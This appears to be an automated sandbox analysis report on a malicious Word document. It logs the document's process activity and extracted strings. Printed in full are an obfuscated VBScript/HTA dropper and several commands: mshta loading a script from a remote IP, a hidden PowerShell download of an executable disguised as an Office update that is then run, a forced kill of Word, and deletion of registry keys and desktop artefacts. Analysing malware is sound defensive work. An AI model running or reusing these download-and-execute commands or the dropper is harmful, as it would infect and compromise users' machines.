Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im winword.exe;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item -Path HKCU:\Software\Microsoft\Office\16.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\14.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\15.0\Word\Resiliency -recurse;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .cs
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://91.219.236.207/img/left.jpg', '\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe');

Spreading:

Enumerates the file system

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData\Roaming\Microsoft\Office
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData\Roaming
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: C:\Users\user\AppData\Roaming\Microsoft

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Reads internet explorer settings

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_USERS\Software\Microsoft\Internet Explorer\Settings

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: 17:ENU:^http.*\.pdb$ source: powershell.exe
Source:	Binary string: Display this usage messageSSpecify debug information file name (default: output file name with .pdb extension)5### Visual C# 2005 Compiler Defect Report, created %s source: csc.exe
Source:	Binary string: mscorrc.pdb source: powershell.exe
Source:	Binary string: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exeude http.pdb, http.dll, *.csRemove source: mshta.exe
Source:	Binary string: version.pdb source: OfficeUpdte-KB9748956.exe
Source:	Binary string: http*.pdb source: powershell.exe
Source:	Binary string: $B$BC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-WindowStyleHiddenRemove-Item'C:\Users\user\Desktop\'-includehttp.pdb,http.dll,*.cs source: powershell.exe
Source:	Binary string: System.EnterpriseServices.Wrapper.pdb source: WINWORD.EXE
Source:	Binary string: KP3I:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe"e http.pdb, http.dll, *.csRe0 source: mshta.exe
Source:	Binary string: YORemove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .cs source: powershell.exe
Source:	Binary string: WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .cs source: mshta.exe
Source:	Binary string: kernelbase.pdb source: OfficeUpdte-KB9748956.exe
Source:	Binary string: http*.pdb@ source: powershell.exe
Source:	Binary string: Jow.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 : Set Office = CreateObject( "WScript.Shell" ) : Office.run "Po"+"w"+"erS"+"he"+"ll -Window"+"Style Hid"+"den taskkill /f /im winword.exe;",0,true : Office.run "Po"+"w"+"erS"+"he"+"ll -Window"+"Style Hid"+"den Rem"+"ove-I"+"tem -Path HK"+"CU:\Software\Micro"+"soft\Office\16.0\Word\R"+"esili"+"ency -recurse;Re"+"move"+"-I"+"tem -Path HK"+"CU:\Soft"+"ware\Micros"+"oft\Off"+"ice\14.0\Wo"+"rd\Res"+"iliency -recurse;Re"+"move"+"-I"+"tem -Path H"+"KC"+"U:\S"+"oftw"+"are\Mic"+"rosoft\O"+"ffi"+"ce\15.0\Wor"+"d\Re"+"sili"+"en"+"cy -recurse;",0,false : Office.run "Po"+"w"+"erS"+"he"+"ll -Window"+"Style Hid"+"den Remove-Item '" & Office.CurrentDirectory & "\' -include http.pdb, http.dll, .cs",0,false : Randomize : RndName = "OfficeUpdte-KB" & Int(10000000 * Rnd()) & ".exe" : appData = Office.expandEnvironmentStrings("%APPDATA%") & "\Microsoft\Windows\" & RndName : Office.run "cm"+"d."+"e"+"xe "+" '/c start /MAX """" winword /q /mFile3 ",0,false : Office.run "Po"+"w"+"erS"
Source:	Binary string: advapi32.pdb source: OfficeUpdte-KB9748956.exe
Source:	Binary string: 5M<script language="VBScript">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 : Set Office = CreateObject( "WScript.Shell" ) : Office.run "Po"+"w"+"erS"+"he"+"ll -Window"+"Style Hid"+"den taskkill /f /im winword.exe;",0,true : Office.run "Po"+"w"+"erS"+"he"+"ll -Window"+"Style Hid"+"den Rem"+"ove-I"+"tem -Path HK"+"CU:\Software\Micro"+"soft\Office\16.0\Word\R"+"esili"+"ency -recurse;Re"+"move"+"-I"+"tem -Path HK"+"CU:\Soft"+"ware\Micros"+"oft\Off"+"ice\14.0\Wo"+"rd\Res"+"iliency -recurse;Re"+"move"+"-I"+"tem -Path H"+"KC"+"U:\S"+"oftw"+"are\Mic"+"rosoft\O"+"ffi"+"ce\15.0\Wor"+"d\Re"+"sili"+"en"+"cy -recurse;",0,false : Office.run "Po"+"w"+"erS"+"he"+"ll -Window"+"Style Hid"+"den Remove-Item '" & Office.CurrentDirectory & "\' -include http.pdb, http.dll, .cs",0,false : Randomize : RndName = "OfficeUpdte-KB" & Int(10000000 * Rnd()) & ".exe" : appData = Office.expandEnvironmentStrings("%APPDATA%") & "\Microsoft\Windows\" & RndName : Office.run "cm"+"d."+"e"+"xe "+" '/c start /MAX """" winword /q /mFile3 ",0,
Source:	Binary string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-WindowStyleHiddenRemove-Item'C:\Users\user\Desktop\'-includehttp.pdb,http.dll,.cs source: powershell.exe
Source:	Binary string: C:\Users\user\Desktop\C:\Windows\System32\WindowsPowerShell\v1.0;C:\Windows\system32;C:\Windows\system;C:\Windows;.;%SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\Office14\;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .csC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWinsta0\Default source: powershell.exe
Source:	Binary string: i'\' -include http.pdb, http.dll, .cs@ source: mshta.exe
Source:	Binary string: 43C:\Users\user\AppData\Local\Temp\h39sf8po.pdb source: WINWORD.EXE
Source:	Binary string: kernel32.pdb source: OfficeUpdte-KB9748956.exe
Source:	Binary string: c:\Windows\System32\com\SOAPAssembly\http100914219423642070img0office4png.pdb source: WINWORD.EXE, http100914219423642070img0office4png.dll.2.dr
Source:	Binary string: http*.pdb,p source: powershell.exe
Source:	Binary string: ntdll.pdb source: OfficeUpdte-KB9748956.exe
Source:	Binary string: WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .csv source: mshta.exe
Source:	Binary string: http*.pdb, source: powershell.exe
Source:	Binary string: 43C:\Users\user\AppData\Local\Temp\h39sf8po.pdb, source: WINWORD.EXE
Source:	Binary string: ^http.*\.pdb$ source: powershell.exe
Source:	Binary string: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .cs source: powershell.exe

Classification label

Show sources

Source: classification engine

Classification label: mal84.evad.expl.winDOC@23/84@1/4

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$Mal.doc

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVRB725.tmp

Found command line output

Show sources

Source: C:\Windows\System32\taskkill.exe	Console Write: ..M.....a..u..0.....<...D.............................................B.........y.B.......B.B...E..v..M.....H..........v
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........L.....6.#........Kc..........Kc.......jn.r....jnfo.]Hn..(...........Da....6.Da....6.8F...3l..........r..........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F..#......u................a..u..0.................u...................#.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F../...i.e.n.c.y.'. .b.e.c.a.u.s.e. .i.t. .d.o.e.s. .n.o.t. .e.x.i.s.t.........~..^....8...B...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F../......u................a..u..0...................................../.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F..;...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.2...............................;.......~..^....8..."...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F..;......u................a..u..0.....................................;.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F..G...A..uP...............a..u..0.................#...................G.......~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F..G......u................a..u..0.................>...................G.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F..S...A..uP...............a..u..0.................f...................S.......~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F..S......u................a..u..0.....................................S.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F.._...A..uP...............a..u..0....................................._.......~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.._......u................a..u..0....................................._.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F..k...y. .-.r.e.c.u.r.s.e.;..u..0.....................................k.......~..^....8...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F..k......u................a..u..0.....................................k.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F..w...A..uP...............a..u..0................./...................w.......~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F..w......u................a..u..0.................J...................w.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......A..uP...............a..u..0.................r...........................~..^........d...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......A..uP...............a..u..0.............................................~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F...... . . .e.I.t.e.m.C.o.m.m.a.n.d...........................................~..^....8...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F...... ..uP...............a..u..0.................;...........................~..^....8...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.................V...........................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......A..uP...............a..u..0.............................................~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......i.e.n.c.y.'. .b.e.c.a.u.s.e. .i.t. .d.o.e.s. .n.o.t. .e.x.i.s.t.........~..^....8...B...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.................=...........................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.2.........e...........................~..^....8...$...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......A..uP...............a..u..0.............................................~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......A..uP...............a..u..0.............................................~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......A..uP...............a..u..0.............................................~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.................I...........................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......y. .-.r.e.c.u.r.s.e.;..u..0.................r...........................~..^....8...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......A..uP...............a..u..0.............................................~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F......A..uP...............a..u..0.............................................~..^........d...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F.........u................a..u..0.............................................>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F..'...A..uP...............a..u..0.................;...................'.......~..^........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F..'......u................a..u..0.................V...................'.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F..3... . . .e.I.t.e.m.C.o.m.m.a.n.d...............~...................3.......~..^....8...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F..3......u................a..u..0.....................................3.......>..^....x...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........H...8F..?... ..uP...............a..u..0.....................................?.......~..^....8...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............8F..?......u................a..u..0.....................................?.......>..^....x...................

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\System32\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "winword.exe")

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Sample is known by Antivirus (Virustotal or Metascan)

Show sources

Source: Mal.doc

Virustotal: hash found

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\Mal.doc
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h39sf8po.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESD201.tmp' 'c:\Windows\System32\com\SOAPAssembly\CSCD1D2.tmp'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' http://91.219.236.207/img/word.db
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im winword.exe;
Source: unknown	Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\system32\taskkill.exe' /f /im winword.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item -Path HKCU:\Software\Microsoft\Office\16.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\14.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\15.0\Word\Resiliency -recurse;
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .cs
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' '/c start /MAX '' winword /q /mFile3
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://91.219.236.207/img/left.jpg', '\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe');
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE winword /q /mFile3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h39sf8po.cmdline'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' http://91.219.236.207/img/word.db
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESD201.tmp' 'c:\Windows\System32\com\SOAPAssembly\CSCD1D2.tmp'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden taskkill /f /im winword.exe;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item -Path HKCU:\Software\Microsoft\Office\16.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\14.0\Word\Resiliency -recurse;Remove-Item -Path HKCU:\Software\Microsoft\Office\15.0\Word\Resiliency -recurse;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden Remove-Item 'C:\Users\user\Desktop\' -include http.pdb, http.dll, .cs
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' '/c start /MAX '' winword /q /mFile3
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://91.219.236.207/img/left.jpg', '\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe');
Source: C:\Windows\System32\mshta.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\taskkill.exe 'C:\Windows\system32\taskkill.exe' /f /im winword.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE winword /q /mFile3

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Show sources

Source: OfficeUpdte-KB9748956.exe.17.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Contains functionality to call native functions

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe	Code function: 24_2_00805890 NtTerminateProcess,	24_2_00805890
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe	Code function: 24_2_008051C0 NtQuerySystemInformation,	24_2_008051C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe	Code function: 24_2_008042A0 NtAllocateVirtualMemory,	24_2_008042A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe	Code function: 24_2_00805280 NtReadFile,	24_2_00805280

Creates files inside the system directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Windows\system32\com\SOAPAssembly

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Deletes Windows files

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

File deleted: C:\Windows\System32\com\SOAPAssembly\CSCD1D2.tmp

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\OfficeUpdte-KB9748956.exe

Code function: String function: 00811C24 appears 70 times

PE file contains strange resources

Show sources

Source: OfficeUpdte-KB9748956.exe.17.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: OfficeUpdte-KB9748956.exe.17.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: OfficeUpdte-KB9748956.exe.17.dr	Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST

PE file does not import any functions

Show sources

Source: http100914219423642070img0office4png.dll.2.dr

Static PE information: No import functions for PE file found

Reads the hosts file

Show sources

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts

Searches for the Microsoft Outlook file path

Show sources

